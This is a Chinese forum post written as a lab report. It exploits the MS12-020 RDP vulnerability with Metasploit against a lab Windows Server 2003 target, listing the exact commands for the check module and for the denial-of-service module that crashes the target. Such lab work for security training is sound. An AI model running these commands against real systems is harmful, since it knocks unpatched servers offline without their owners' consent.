本帖最后由 赵庆煜 于 2024-3-20 08:56 编辑
一、实验目的 熟悉ms12-020漏洞的原理及利用方法,掌握Metasploit的配置使用方法。 二、实验环境 靶机:Windows server 2003(开启远程桌面) 测试主机系统:kali-2023.4 三、实验原理 (1)关于Metasploit Metasploit是一个强大的开源平台,可以用来开发、测试和使用恶意代码,同时为渗透测试、shellcode编写和漏洞研究提供了一个可靠平台。 (2)MS12-020是指Windows RDP远程桌面协议中存在的远程代码执行漏洞 • 开启远程桌面服务(3389端口) 的系统可执行远程代码, 从而导致蓝屏重启; • 受影响系统: Windows XP、 Windows 7、 Server 2003/2008 远程桌面协议(RDP, Remote Desktop Protocol)是微软公司创建的专有协议。它可以让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”),允许系统用户通过图形用户界面连接到远程系统。在默认情况下,该协议的客户端代理内置在微软的操作系统中。最近远程桌面协议(RDP)中发现的漏洞让大家将目光都聚焦在它身上。知名网络安全专家Dan Kaminsky近日表示,RDP目前正用于500多万个互联网端点中,可以想象,如果企业没有妥善保护RDP,网络和端点安全将受到严重威胁。 四、实验步骤 1.启动Metasploit (1)在操作机Kali上终端使用如下命令,启动Metasploit终端(提示符msf>):msfdb init && msfconsole 2.检测靶机是否存在ms12-020漏洞 (1)在Metasploit终端下输入以下命令查找ms12-020相关的模块:search ms12-020 搜索的结果中,第一项为ms12-020漏洞利用模块,第二项为ms12-020漏洞检测模块: (2)分别输入以下命令,使用ms12_020_check模块对目标机进行漏洞检测,以确认目标机存在ms12-020漏洞: use auxiliary/scanner/rdp/ms12_020_check //使用ms12_020_check模块 show options //查看该模块需要设置哪些参数 set RHOSTS [靶机IP] //设置目标机的IP地址 run //执行 检测结果显示,靶机存在ms12-020漏洞! 3.利用ms12-020漏洞对靶机进行攻击 在Metasploit终端下分别输入以下命令,使用ms12_020_maxchannelids模块对目标机的ms12-020漏洞进行利用: use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //使用ms12_020_maxchannelids模块 show options //查看该模块需要设置哪些参数 set RHOST [靶机IP] //设置目标机的IP地址 run //执行 此时,靶机被攻击后自动重启,重启原因是蓝屏: 五、实验总结 本次实验,成功利用Metasploit工具对存在ms12-020漏洞的靶机进行了攻击,熟悉了ms12-020漏洞的原理及利用方法,同时也掌握了Metasploit的配置使用方法。 |